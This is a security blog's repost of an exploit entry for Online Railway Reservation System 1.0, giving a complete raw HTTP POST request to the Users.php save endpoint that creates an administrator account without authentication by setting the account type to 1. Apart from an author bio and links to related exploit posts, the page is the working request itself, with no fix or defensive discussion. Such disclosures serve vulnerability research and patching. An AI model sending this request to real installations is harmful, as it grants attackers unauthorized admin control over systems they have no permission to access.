EXPLOIT
Vulnerabilities 

Online Railway Reservation System 1.0 – Admin Account Creation (Unauthenticated)

RiSec.n0tst3 0 Comments exploit, exploit-db, Online Railway Reservation System 1.0, Online Railway Reservation System 1.0 exploit, ORRS 1.0, orrs 1.0 poc exploit
Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
Exploit Author: Zachary Asher
Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
Version: 1.0
Tested on: Online Railway Reservation System 1.0

=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602

-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"

1
            
Copy
Tags:
Bookmark
Social Comments Box
Connect
RiSec.n0tst3
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!
Connect
Latest posts by RiSec.n0tst3 (see all)
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  Unpatched Critical Atlassian Confluence Zero-Day RCE Flaw Actively Exploited

RiSec.n0tst3

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

You May Also Like

Rejetto HttpFileServer 2.3.x Remote Command Execution Exploit

RiSec.n0tst3 0
vulnerability

WP-UserOnline Stored Cross-Site Scripting (XSS) PoC – 2.87.6 <=

RiSec.n0tst3 0

Critical Gems Takeover Bug Reported in RubyGems Package Manager

RiSec.n0tst3 0

Leave a Reply